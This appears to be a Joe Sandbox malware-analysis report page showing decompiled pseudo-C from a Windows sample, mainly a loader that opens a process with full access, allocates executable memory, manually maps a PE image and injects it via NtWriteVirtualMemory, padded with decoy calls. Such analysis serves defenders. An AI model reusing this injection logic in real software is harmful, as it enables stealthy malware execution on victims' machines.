						if( *((char*)(0x329d7f0)) <= 1 ||  *0x3289000 != 0) {
							_t80 =  *0x0329D7D8;
							if( *0x0329D7D8 != 0) {
								E03265E00(_t80);
								_t90 =  *((intOrPtr*)(0x329d7d8));
								_t21 = _t90 + 0x10; // 0x3260000
								_t87 =  *_t21;
								_t22 = _t90 + 4; // 0x3260000
								if(_t87 !=  *_t22 && _t87 != 0) {
									FreeLibrary(_t87);
								}
							}
						}
						E03264068();
						if( *((char*)(0x329d7f0)) == 1) {
							 *0x0329D7EC();
						}
						if( *((char*)(0x329d7f0)) != 0) {
							E032642F0();
						}
						if( *0x329d7c8 == 0) {
							if( *0x329b028 != 0) {
								 *0x329b028();
							}
							_t42 =  *0x3289000; // 0x0
							ExitProcess(_t42);
						}
						memcpy(0x329d7c8,  *0x329d7c8, 0xb << 2);
						_t92 = _t92 + 0xc;
						goto L18;
					} else {
						do {
							 *0x329b048 = 0;
							 *((intOrPtr*)( *0x329b048))();
						} while ( *0x329b048 != 0);
						goto L16;
					}
				} else {
					_t55 = E032640F4(); // executed
					return _t55;
				}
			}

0x0326415c
0x0326415c
0x0326416c
0x0326416c
0x0326416e
0x03264174
0x0326417a
0x03264180
0x03264186
0x0326418b
0x03264194
0x0326419a
0x032641a0
0x032641a2
0x032641a2
0x032641a4
0x032641af
0x032641b9
0x032641be
0x032641c6
0x032641c7
0x032641cc
0x032641cd
0x032641d0
0x032641d6
0x032641dc
0x032641dc
0x032641df
0x032641e0
0x032641e6
0x032641ee
0x032641ee
0x032641f0
0x032641f1
0x032641f6
0x032641f8
0x032641f8
0x03264202
0x03264204
0x0326420b
0x0326420b
0x03264215
0x032643ac
0x032643ad
0x032643ae
0x032643af
0x032643be
0x032643d4
0x032643db
0x032643dd
0x032643e2
0x032643e9
0x032643e9
0x032643ee
0x032643f2
0x032643ff
0x032643ff
0x03264402
0x0326440b
0x03264416
0x0326441b
0x0326441f
0x03264424
0x03264427
0x03264427
0x0326442a
0x0326442d
0x03264434
0x03264434
0x0326442d
0x0326441b
0x03264439
0x03264442
0x03264444
0x03264444
0x0326444b
0x0326444d
0x0326444d
0x03264455
0x0326445e
0x03264460
0x03264460
0x03264466
0x0326446c
0x0326446c
0x0326447c
0x0326447c
0x00000000
0x032643c5
0x032643c5
0x032643cb
0x032643cd
0x032643cf
0x00000000
0x032643c5
0x0326421b
0x0326421b
0x03264220
0x03264220

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0bb1a4cabca619da3245d590000135c14024fddd36b07e92eaa38a65dfb12a9
Instruction ID: 265b458d721248f02dca958faa323307480fc7504102dadd124950df32f01243
Opcode Fuzzy Hash: f0bb1a4cabca619da3245d590000135c14024fddd36b07e92eaa38a65dfb12a9
Instruction Fuzzy Hash: ED2142789142098FCB08EF2AF8886AA7BE0FF59710F54C09FE8588B358C73099C1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 032640F4 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33591a1e6be6965d1e4461e1218a9e83778ff475ca519fc53ee5e284e9d0674f
Instruction ID: c042ce6994acfac801e9a3e1fb6376691f8c61697add886be95e45deca699f1d
Opcode Fuzzy Hash: 33591a1e6be6965d1e4461e1218a9e83778ff475ca519fc53ee5e284e9d0674f
Instruction Fuzzy Hash: 08F02B726146069F9711EF4BED8085AFBECEF59B1035640BAE504C7A10D531AC91C650

Uniqueness

Uniqueness Score: -1.00%

Function 032874E0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: InetOffline
String ID:
API String ID: 3180263700-0
Opcode ID: bda40c73234dca3d881477a73093573e2fc81d7cefa59c78efb77cb5b2cee47e
Instruction ID: 701a6aa4e7112b57518088536733743828b23c4170f095d004f803390fbd3c3b
Opcode Fuzzy Hash: bda40c73234dca3d881477a73093573e2fc81d7cefa59c78efb77cb5b2cee47e
Instruction Fuzzy Hash: 8190022605470C051040B2953401D16724C1A5151058040225B191962259A564A160B9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0327A6F4 Relevance: 64.5, APIs: 16, Strings: 20, Instructions: 1543
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0327A6F4(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				char _v5;
				void* _v12;
				short _v14;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				intOrPtr _v152;
				char _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char _v208;
				char _v212;
				intOrPtr _v216;
				char _v220;
				char _v224;
				char _v228;
				intOrPtr _v232;
				char _v236;
				char _v240;
				char _v244;
				intOrPtr _v248;
				char _v252;
				char _v256;
				char _v260;
				intOrPtr _v264;
				char _v268;
				char _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				char _v300;
				char _v304;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v320;
				char _v324;
				intOrPtr _v328;
				char _v332;
				char _v336;
				char _v340;
				intOrPtr _v344;
				char _v348;
				char _v352;
				char _v356;
				intOrPtr _v360;
				char _v364;
				char _v368;
				char _v372;
				intOrPtr _v376;
				char _v380;
				char _v384;
				char _v388;
				intOrPtr _v392;
				char _v396;
				char _v400;
				char _v404;
				intOrPtr _v408;
				char _v412;
				char _v416;
				char _v420;
				intOrPtr _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				char _v444;
				char _v448;
				char _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				char _v468;
				intOrPtr _v472;
				char _v476;
				char _v480;
				char _v484;
				intOrPtr _v488;
				char _v492;
				char _v496;
				char _v500;
				intOrPtr _v504;
				char _v508;
				char _v512;
				char _v516;
				intOrPtr _v520;
				char _v524;
				char _v528;
				char _v532;
				intOrPtr _v536;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				char _v556;
				char _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				char _v592;
				char _v596;
				intOrPtr _v600;
				char _v604;
				char _v608;
				char _v612;
				intOrPtr _v616;
				char _v620;
				char _v624;
				char _v628;
				intOrPtr _v632;
				char _v636;
				char _v640;
				char _v644;
				intOrPtr _v648;
				char _v652;
				char _v656;
				char _v660;
				intOrPtr _v664;
				char _v668;
				char _v672;
				char _v676;
				intOrPtr _v680;
				char _v684;
				char _v688;
				char _v692;
				intOrPtr _v696;
				char _v700;
				char _v704;
				char _v708;
				intOrPtr _v712;
				char _v716;
				char _v720;
				char _v724;
				intOrPtr _v728;
				char _v732;
				char _v736;
				char _v740;
				intOrPtr _v744;
				char _v748;
				char _v752;
				char _v756;
				intOrPtr _v760;
				char _v764;
				char _v768;
				char _v772;
				intOrPtr _v776;
				char _v780;
				char _v784;
				char _v788;
				intOrPtr _v792;
				char _v796;
				char _v800;
				intOrPtr _t533;
				intOrPtr* _t535;
				intOrPtr _t536;
				intOrPtr _t539;
				intOrPtr _t540;
				void* _t681;
				void* _t735;
				intOrPtr _t745;
				intOrPtr _t746;
				intOrPtr _t748;
				intOrPtr _t793;
				intOrPtr _t880;
				intOrPtr _t881;
				signed short _t899;
				intOrPtr _t904;
				void* _t907;
				intOrPtr _t923;
				intOrPtr _t969;
				_Unknown_base(*)()* _t1059;
				intOrPtr _t1102;
				intOrPtr _t1103;
				intOrPtr _t1104;
				intOrPtr _t1105;
				_Unknown_base(*)()** _t1107;
				_Unknown_base(*)()* _t1125;
				intOrPtr _t1198;
				intOrPtr _t1199;
				_Unknown_base(*)()** _t1201;
				void* _t1218;
				intOrPtr _t1221;
				short _t1225;
				intOrPtr _t1226;
				intOrPtr _t1227;
				intOrPtr _t1228;
				intOrPtr _t1246;
				void* _t1250;
				intOrPtr _t1291;
				void* _t1321;
				void* _t1326;
				void* _t1331;
				void* _t1336;
				void* _t1341;
				void* _t1346;
				void* _t1351;
				void* _t1359;
				void* _t1364;
				void* _t1369;
				void* _t1374;
				void* _t1379;
				void* _t1392;
				void* _t1397;
				void* _t1402;
				intOrPtr _t1403;
				void* _t1411;
				void* _t1416;
				void* _t1421;
				signed int _t1425;
				void* _t1431;
				void* _t1436;
				void* _t1441;
				void* _t1446;
				void* _t1451;
				void* _t1456;
				void* _t1461;
				void* _t1466;
				void* _t1471;
				void* _t1476;
				void* _t1482;
				void* _t1487;
				void* _t1492;
				void* _t1497;
				void* _t1502;
				void* _t1507;
				void* _t1512;
				void* _t1517;
				void* _t1522;
				void* _t1527;
				_Unknown_base(*)()** _t1528;
				void* _t1533;
				void* _t1538;
				void* _t1543;
				void* _t1548;
				_Unknown_base(*)()** _t1549;
				void* _t1554;
				void* _t1559;
				void* _t1564;
				void* _t1569;
				void* _t1574;
				void* _t1579;
				intOrPtr _t1582;
				void* _t1589;
				void* _t1592;
				intOrPtr _t1596;
				intOrPtr _t1597;
				short _t1609;
				void* _t1612;

				_t1596 = _t1597;
				_t1250 = 0x63;
				do {
					_push(0);
					_push(0);
					_t1250 = _t1250 - 1;
					_t1598 = _t1250;
				} while (_t1250 != 0);
				_push(_t1250);
				_push(_t1596);
				_push(0x327c06a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1597;
				E032644F4(0x329e544, 0x327c088);
				_push(0x327c094);
				_push( *0x329e544);
				_push("OpenSession");
				E03264824();
				E03264698( &_v20, E03264964(_v24));
				_push(_v20);
				E032647B0( &_v32,  *0x329e544, 0x327c094);
				E03264698( &_v28, E03264964(_v32));
				_pop(_t1321);
				E03277C04(_v28,  *0x329e544, _t1321, _t1598);
				_push(0x327c094);
				_push( *0x329e544);
				_push("Initialize");
				E03264824();
				E03264698( &_v36, E03264964(_v40));
				_push(_v36);
				E032647B0( &_v48,  *0x329e544, 0x327c094);
				E03264698( &_v44, E03264964(_v48));
				_pop(_t1326);
				E03277C04(_v44,  *0x329e544, _t1326, _t1598);
				_push(0x327c094);
				_push( *0x329e544);
				_push("ScanString");
				E03264824();
				E03264698( &_v52, E03264964(_v56));
				_push(_v52);
				E032647B0( &_v64,  *0x329e544, 0x327c094);
				E03264698( &_v60, E03264964(_v64));
				_pop(_t1331);
				E03277C04(_v60,  *0x329e544, _t1331, _t1598);
				_v5 = 0;
				_push(0x327c094);
				_push( *0x329e544);
				_push("UacInitialize");
				E03264824();
				E03264698( &_v68, E03264964(_v72));
				_push(_v68);
				E032647B0( &_v80,  *0x329e544, 0x327c094);
				E03264698( &_v76, E03264964(_v80));
				_pop(_t1336);
				E03277C04(_v76,  *0x329e544, _t1336, _t1598);
				_push(0x327c094);
				_push( *0x329e544);
				_push("ScanString");
				E03264824();
				E03264698( &_v84, E03264964(_v88));
				_push(_v84);
				E032647B0( &_v96,  *0x329e544, 0x327c094);
				E03264698( &_v92, E03264964(_v96));
				_pop(_t1341);
				E03277C04(_v92,  *0x329e544, _t1341, _t1598);
				_push(0x327c094);
				_push( *0x329e544);
				_push("UacInitialize");
				E03264824();
				E03264698( &_v100, E03264964(_v104));
				_push(_v100);
				E032647B0( &_v112,  *0x329e544, 0x327c094);
				E03264698( &_v108, E03264964(_v112));
				_pop(_t1346);
				E03277C04(_v108,  *0x329e544, _t1346, _t1598);
				_push(0x327c094);
				_push( *0x329e544);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v116, E03264964(_v120));
				_push(_v116);
				E032647B0( &_v128,  *0x329e544, 0x327c094);
				E03264698( &_v124, E03264964(_v128));
				_pop(_t1351);
				E03277C04(_v124,  *0x329e544, _t1351, _t1598);
				_t533 =  *0x329a798; // 0x329e324
				E03277AE4(_t533, 0, 0, 0, 0);
				_t535 =  *0x329a96c; // 0x329e33c
				 *_t535 = _a8;
				_t536 =  *0x329a96c; // 0x329e33c
				 *((intOrPtr*)(_t536 + 4)) = 0;
				 *0x329e510 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtOpenProcess");
				_t539 =  *0x329a96c; // 0x329e33c
				_t540 =  *0x329a798; // 0x329e324
				 *0x329e510(0x329e53c, 0x1f0fff, _t540, _t539);
				_push(0x327c094);
				_push( *0x329e544);
				_push("Initialize");
				E03264824();
				E03264698( &_v132, E03264964(_v136));
				_push(_v132);
				E032647B0( &_v144,  *0x329e544, 0x327c094);
				E03264698( &_v140, E03264964(_v144));
				_pop(_t1359);
				E03277C04(_v140,  *0x329e544, _t1359, _t1598);
				_push(0x327c094);
				_push( *0x329e544);
				_push("ScanString");
				E03264824();
				E03264698( &_v148, E03264964(_v152));
				_push(_v148);
				E032647B0( &_v160,  *0x329e544, 0x327c094);
				E03264698( &_v156, E03264964(_v160));
				_pop(_t1364);
				E03277C04(_v156,  *0x329e544, _t1364, _t1598);
				E03262EE0();
				 *0x329e548 = (E03262F08(9) + 1) * 0x5f5e100;
				_push(0x327c094);
				_push( *0x329e544);
				_push("OpenSession");
				E03264824();
				E03264698( &_v164, E03264964(_v168));
				_push(_v164);
				E032647B0( &_v176,  *0x329e544, 0x327c094);
				E03264698( &_v172, E03264964(_v176));
				_pop(_t1369);
				E03277C04(_v172,  *0x329e544, _t1369, _t1598);
				_push(0x327c094);
				_push( *0x329e544);
				_push("Initialize");
				E03264824();
				E03264698( &_v180, E03264964(_v184));
				_push(_v180);
				E032647B0( &_v192,  *0x329e544, 0x327c094);
				E03264698( &_v188, E03264964(_v192));
				_pop(_t1374);
				E03277C04(_v188,  *0x329e544, _t1374, _t1598);
				_push(0x327c094);
				_push( *0x329e544);
				_push("ScanString");
				E03264824();
				E03264698( &_v196, E03264964(_v200));
				_push(_v196);
				E032647B0( &_v208,  *0x329e544, 0x327c094);
				E03264698( &_v204, E03264964(_v208));
				_pop(_t1379);
				E03277C04(_v204,  *0x329e544, _t1379, _t1598);
				_t1599 =  *0x329e53c;
				if( *0x329e53c == 0) {
					L21:
					E03277B14( *0x329e53c, "BCryptVerifySignature");
					E03277B14( *0x329e53c, "BCryptQueryProviderRegistration");
					E03277B14( *0x329e53c, "BCryptRegisterProvider");
					E03277B14( *0x329e53c, "NtReadVirtualMemory");
					E03277B14( *0x329e53c, "NtOpenObjectAuditAlarm");
					E03277B14( *0x329e53c, "I_QueryTagInformation");
					E03277B14( *0x329e53c, "NtSetSecurityObject");
					E03277B14( *0x329e53c, "NtOpenProcess");
					_push(0x327c094);
					_push( *0x329e544);
					_push("UacInitialize");
					E03264824();
					E03264698( &_v756, E03264964(_v760));
					_push(_v756);
					E032647B0( &_v768,  *0x329e544, 0x327c094);
					E03264698( &_v764, E03264964(_v768));
					_pop(_t1392);
					E03277C04(_v764,  *0x329e544, _t1392, _t1613);
					_push(0x327c094);
					_push( *0x329e544);
					_push("ScanString");
					E03264824();
					E03264698( &_v772, E03264964(_v776));
					_push(_v772);
					E032647B0( &_v784,  *0x329e544, 0x327c094);
					E03264698( &_v780, E03264964(_v784));
					_pop(_t1397);
					E03277C04(_v780,  *0x329e544, _t1397, _t1613);
					_push(0x327c094);
					_push( *0x329e544);
					_push("OpenSession");
					E03264824();
					E03264698( &_v788, E03264964(_v792));
					_push(_v788);
					E032647B0( &_v800,  *0x329e544, 0x327c094);
					E03264698( &_v796, E03264964(_v800));
					_pop(_t1402);
					E03277C04(_v796,  *0x329e544, _t1402, _t1613);
					_pop(_t1403);
					 *[fs:eax] = _t1403;
					_push(0x327c071);
					E032644C4( &_v800, 0x64);
					return E032644C4( &_v400, 0x60);
				}
				_t681 =  *((intOrPtr*)( *_a4))();
				 *0x329e530 = E032779BC(GetCurrentProcess(), 0, _t681, 0x3000, 0x40);
				_push(0x327c094);
				_push( *0x329e544);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v212, E03264964(_v216));
				_push(_v212);
				E032647B0( &_v224,  *0x329e544, 0x327c094);
				E03264698( &_v220, E03264964(_v224));
				_pop(_t1411);
				E03277C04(_v220,  *0x329e544, _t1411, _t1599);
				_push(0x327c094);
				_push( *0x329e544);
				_push("UacInitialize");
				E03264824();
				E03264698( &_v228, E03264964(_v232));
				_push(_v228);
				E032647B0( &_v240,  *0x329e544, 0x327c094);
				E03264698( &_v236, E03264964(_v240));
				_pop(_t1416);
				E03277C04(_v236,  *0x329e544, _t1416, _t1599);
				_push(0x327c094);
				_push( *0x329e544);
				_push("OpenSession");
				E03264824();
				E03264698( &_v244, E03264964(_v248));
				_push(_v244);
				E032647B0( &_v256,  *0x329e544, 0x327c094);
				E03264698( &_v252, E03264964(_v256));
				_pop(_t1421);
				E03277C04(_v252,  *0x329e544, _t1421, _t1599);
				if( *0x329e530 == 0) {
					goto L21;
				}
				E032758D8(_a4, 0, 0);
				 *((intOrPtr*)( *_a4))();
				 *((intOrPtr*)( *_a4 + 0xc))();
				_t1592 =  *0x329e530; // 0x0
				if(IsBadReadPtr(_t1592, 0x40) != 0 ||  *_t1592 != 0x5a4d) {
					L20:
					_push( *((intOrPtr*)( *_a4))(0x4000));
					_t735 =  *0x329e530; // 0x0
					_push(_t735);
					_push(GetCurrentProcess());
					L032779B4();
					goto L21;
				} else {
					_v12 =  *((intOrPtr*)(_t1592 + 0x3c)) +  *0x329e530;
					if(IsBadReadPtr(_v12, 0xf8) != 0 ||  *_v12 != 0x4550) {
						goto L20;
					} else {
						 *0x329e524 = _v12 + 0xf8;
						_t1425 =  *0x329e548; // 0x0
						 *0x329e52c = _t1425 -  *((intOrPtr*)(_v12 + 0x50));
						_t1605 =  *0x329e52c;
						if( *0x329e52c == 0) {
							L19:
							_push(0x4000);
							_t745 =  *0x329e52c; // 0x0
							_push(_t745);
							_t746 =  *0x329e534; // 0x0
							_push(_t746);
							_push(GetCurrentProcess());
							L032779B4();
							goto L20;
						}
						_t748 =  *0x329e52c; // 0x0
						 *0x329e534 = E032779BC(GetCurrentProcess(), 0, _t748, 0x3000, 0x40);
						_push(0x327c094);
						_push( *0x329e544);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v260, E03264964(_v264));
						_push(_v260);
						E032647B0( &_v272,  *0x329e544, 0x327c094);
						E03264698( &_v268, E03264964(_v272));
						_pop(_t1431);
						E03277C04(_v268,  *0x329e544, _t1431, _t1605);
						_push(0x327c094);
						_push( *0x329e544);
						_push("UacInitialize");
						E03264824();
						E03264698( &_v276, E03264964(_v280));
						_push(_v276);
						E032647B0( &_v288,  *0x329e544, 0x327c094);
						E03264698( &_v284, E03264964(_v288));
						_pop(_t1436);
						E03277C04(_v284,  *0x329e544, _t1436, _t1605);
						_push(0x327c094);
						_push( *0x329e544);
						_push("OpenSession");
						E03264824();
						E03264698( &_v292, E03264964(_v296));
						_push(_v292);
						E032647B0( &_v304,  *0x329e544, 0x327c094);
						E03264698( &_v300, E03264964(_v304));
						_pop(_t1441);
						E03277C04(_v300,  *0x329e544, _t1441, _t1605);
						_t1606 =  *0x329e534;
						if( *0x329e534 == 0) {
							goto L19;
						}
						_t793 =  *0x329e52c; // 0x0
						 *0x329e538 = E032779BC( *0x329e53c, 0, _t793, 0x3000, 0x40);
						_push(0x327c094);
						_push( *0x329e544);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v308, E03264964(_v312));
						_push(_v308);
						E032647B0( &_v320,  *0x329e544, 0x327c094);
						E03264698( &_v316, E03264964(_v320));
						_pop(_t1446);
						E03277C04(_v316,  *0x329e544, _t1446, _t1606);
						_push(0x327c094);
						_push( *0x329e544);
						_push("UacInitialize");
						E03264824();
						E03264698( &_v324, E03264964(_v328));
						_push(_v324);
						E032647B0( &_v336,  *0x329e544, 0x327c094);
						E03264698( &_v332, E03264964(_v336));
						_pop(_t1451);
						E03277C04(_v332,  *0x329e544, _t1451, _t1606);
						_push(0x327c094);
						_push( *0x329e544);
						_push("OpenSession");
						E03264824();
						E03264698( &_v340, E03264964(_v344));
						_push(_v340);
						E032647B0( &_v352,  *0x329e544, 0x327c094);
						E03264698( &_v348, E03264964(_v352));
						_pop(_t1456);
						E03277C04(_v348,  *0x329e544, _t1456, _t1606);
						_t1607 =  *0x329e538;
						if( *0x329e538 == 0) {
							_push(0x327c094);
							_push( *0x329e544);
							_push("UacInitialize");
							E03264824();
							E03264698( &_v708, E03264964(_v712));
							_push(_v708);
							E032647B0( &_v720,  *0x329e544, 0x327c094);
							E03264698( &_v716, E03264964(_v720));
							_pop(_t1461);
							E03277C04(_v716,  *0x329e544, _t1461, __eflags);
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanString");
							E03264824();
							E03264698( &_v724, E03264964(_v728));
							_push(_v724);
							E032647B0( &_v736,  *0x329e544, 0x327c094);
							E03264698( &_v732, E03264964(_v736));
							_pop(_t1466);
							E03277C04(_v732,  *0x329e544, _t1466, __eflags);
							_push(0x327c094);
							_push( *0x329e544);
							_push("OpenSession");
							E03264824();
							E03264698( &_v740, E03264964(_v744));
							_push(_v740);
							E032647B0( &_v752,  *0x329e544, 0x327c094);
							E03264698( &_v748, E03264964(_v752));
							_pop(_t1471);
							E03277C04(_v748,  *0x329e544, _t1471, __eflags);
							_push(0x4000);
							_t880 =  *0x329e52c; // 0x0
							_push(_t880);
							_t881 =  *0x329e538; // 0x0
							_push(_t881);
							_push( *0x329e53c);
							L032779B4();
							goto L19;
						}
						_push(0x327c094);
						_push( *0x329e544);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v356, E03264964(_v360));
						_push(_v356);
						E032647B0( &_v368,  *0x329e544, 0x327c094);
						E03264698( &_v364, E03264964(_v368));
						_pop(_t1476);
						E03277C04(_v364,  *0x329e544, _t1476, _t1607);
						 *0x329e528 =  *(_v12 + 6) & 0x0000ffff;
						_t1291 =  *0x329e524; // 0x0
						_t899 =  *0x329e528; // 0x0
						_t904 =  *0x329e534; // 0x0
						E0327A580(_t904, _t1291 - _t1592 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + (_t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899) * 4, _t1592);
						_t907 = ( *0x329e528 & 0x0000ffff) - 1;
						if(_t907 < 0) {
							L14:
							_push(0x327c094);
							_push( *0x329e544);
							_push("UacScan");
							E03264824();
							E03264698( &_v388, E03264964(_v392));
							_push(_v388);
							E032647B0( &_v400,  *0x329e544, 0x327c094);
							E03264698( &_v396, E03264964(_v400));
							_pop(_t1482);
							E03277C04(_v396,  *0x329e544, _t1482, _t1610);
							_t923 =  *((intOrPtr*)(_v12 + 0xa0));
							if(_t923 != 0) {
								_t1582 =  *0x329e538; // 0x0
								_t1612 = _t923 +  *0x329e534;
								_t1221 =  *0x329e534; // 0x0
								E0327A4D0( *((intOrPtr*)(_v12 + 0x34)), _t1221, _t923 +  *0x329e534, _t1582,  *((intOrPtr*)(_v12 + 0xa4)));
							}
							_push(0x327c094);
							_push( *0x329e544);
							_push("UacInitialize");
							E03264824();
							E03264698( &_v404, E03264964(_v408));
							_push(_v404);
							E032647B0( &_v416,  *0x329e544, 0x327c094);
							E03264698( &_v412, E03264964(_v416));
							_pop(_t1487);
							E03277C04(_v412,  *0x329e544, _t1487, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("OpenSession");
							E03264824();
							E03264698( &_v420, E03264964(_v424));
							_push(_v420);
							E032647B0( &_v432,  *0x329e544, 0x327c094);
							E03264698( &_v428, E03264964(_v432));
							_pop(_t1492);
							E03277C04(_v428,  *0x329e544, _t1492, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v436, E03264964(_v440));
							_push(_v436);
							E032647B0( &_v448,  *0x329e544, 0x327c094);
							E03264698( &_v444, E03264964(_v448));
							_pop(_t1497);
							E03277C04(_v444,  *0x329e544, _t1497, _t1612);
							_t969 =  *0x329e534; // 0x0
							E0327A58C(_t969,  *((intOrPtr*)(_v12 + 0x80)) +  *0x329e534);
							_push(0x327c094);
							_push( *0x329e544);
							_push("UacInitialize");
							E03264824();
							E03264698( &_v452, E03264964(_v456));
							_push(_v452);
							E032647B0( &_v464,  *0x329e544, 0x327c094);
							E03264698( &_v460, E03264964(_v464));
							_pop(_t1502);
							E03277C04(_v460,  *0x329e544, _t1502, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("OpenSession");
							E03264824();
							E03264698( &_v468, E03264964(_v472));
							_push(_v468);
							E032647B0( &_v480,  *0x329e544, 0x327c094);
							E03264698( &_v476, E03264964(_v480));
							_pop(_t1507);
							E03277C04(_v476,  *0x329e544, _t1507, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v484, E03264964(_v488));
							_push(_v484);
							E032647B0( &_v496,  *0x329e544, 0x327c094);
							E03264698( &_v492, E03264964(_v496));
							_pop(_t1512);
							E03277C04(_v492,  *0x329e544, _t1512, _t1612);
							 *0x329e520 =  *((intOrPtr*)(_v12 + 0x28)) +  *0x329e538;
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanString");
							E03264824();
							E03264698( &_v500, E03264964(_v504));
							_push(_v500);
							E032647B0( &_v512,  *0x329e544, 0x327c094);
							E03264698( &_v508, E03264964(_v512));
							_pop(_t1517);
							E03277C04(_v508,  *0x329e544, _t1517, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("UacInitialize");
							E03264824();
							E03264698( &_v516, E03264964(_v520));
							_push(_v516);
							E032647B0( &_v528,  *0x329e544, 0x327c094);
							E03264698( &_v524, E03264964(_v528));
							_pop(_t1522);
							E03277C04(_v524,  *0x329e544, _t1522, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v532, E03264964(_v536));
							_push(_v532);
							E032647B0( &_v544,  *0x329e544, 0x327c094);
							E03264698( &_v540, E03264964(_v544));
							_pop(_t1527);
							E03277C04(_v540,  *0x329e544, _t1527, _t1612);
							_t1059 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtWriteVirtualMemory");
							_t1528 =  *0x329a888; // 0x329e320
							 *_t1528 = _t1059;
							_push(0x327c094);
							_push( *0x329e544);
							_push("UacInitialize");
							E03264824();
							E03264698( &_v548, E03264964(_v552));
							_push(_v548);
							E032647B0( &_v560,  *0x329e544, 0x327c094);
							E03264698( &_v556, E03264964(_v560));
							_pop(_t1533);
							E03277C04(_v556,  *0x329e544, _t1533, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("OpenSession");
							E03264824();
							E03264698( &_v564, E03264964(_v568));
							_push(_v564);
							E032647B0( &_v576,  *0x329e544, 0x327c094);
							E03264698( &_v572, E03264964(_v576));
							_pop(_t1538);
							E03277C04(_v572,  *0x329e544, _t1538, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v580, E03264964(_v584));
							_push(_v580);
							E032647B0( &_v592,  *0x329e544, 0x327c094);
							E03264698( &_v588, E03264964(_v592));
							_pop(_t1543);
							E03277C04(_v588,  *0x329e544, _t1543, _t1612);
							_t1102 =  *0x329e540; // 0x0
							_t1103 =  *0x329e52c; // 0x0
							_t1104 =  *0x329e534; // 0x0
							_t1105 =  *0x329e538; // 0x0
							_t1107 =  *0x329a888; // 0x329e320
							 *( *_t1107)( *0x329e53c, _t1105, _t1104, _t1103, _t1102);
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v596, E03264964(_v600));
							_push(_v596);
							E032647B0( &_v608,  *0x329e544, 0x327c094);
							E03264698( &_v604, E03264964(_v608));
